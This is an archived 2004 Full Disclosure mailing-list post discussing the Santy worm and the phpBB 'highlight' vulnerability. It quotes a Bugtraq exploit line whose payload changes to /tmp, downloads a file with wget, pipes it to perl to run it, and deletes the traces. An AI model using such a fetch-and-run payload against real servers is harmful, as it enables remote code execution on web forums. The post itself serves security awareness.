Guardian Digital Inc. > InfoCenter > Mailing List Archives > Full Disclosure

Full Disclosure Mailing List Archive

From: Paul Laudanski (zx@castlecops.com)
Date: Thu Dec 23 2004 - 23:40:46 EST

On Thu, 23 Dec 2004, Patrick Nolan wrote:

> A bot is not uploaded, not sure where that came from.
> And by now, it is not expected to be spreading at all, thanks to the
> interruption in search requests by Google.

There are a couple posts going on about this, for instance take this


"Santy gets easily corrupted," F-Secure Corp's Mikko Hypponen said. "The
exploit it uses is only able to transfer around 20 bytes of data at a
time. So the worm transfers itself from one web site to another in small

"If a chunk gets missing, the worm might still work fine... or it might
fail," Hypponen told ComputerWire. "More generations there are, more
likely it is to fail because of this."

Compare that to an exploit that is posted @bugtraq:



rush=echo _START_; cd /tmp;wget -O .b; perl -pe
.b| perl; rm -f .b *.pl b0t*; echo _END_

It is making use of the highlight exploit in pre phpbb 2.0.11.

Even though the 'worm' itself may be hindered, we can certainly expect
script kiddies to attempt these manually.


Now that is catching the single quote in the highlight argument.

Paul Laudanski - Computer Cops, LLC. CEO & Founder
CastleCops(SM) - http://castlecops.com
Promoting education and health in online security and privacy.
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[ About Guardian Digital ] - [ Press Center ] - [ Contact Us ] - [ System Activation ] - [ Reseller Info ] - [ Online Store ] - [ Site Map ]
Copyright (c) 2000 - 2004 Guardian Digital, Inc. Linux Lockbox and EnGarde are Trademarks of Guardian Digital, Inc.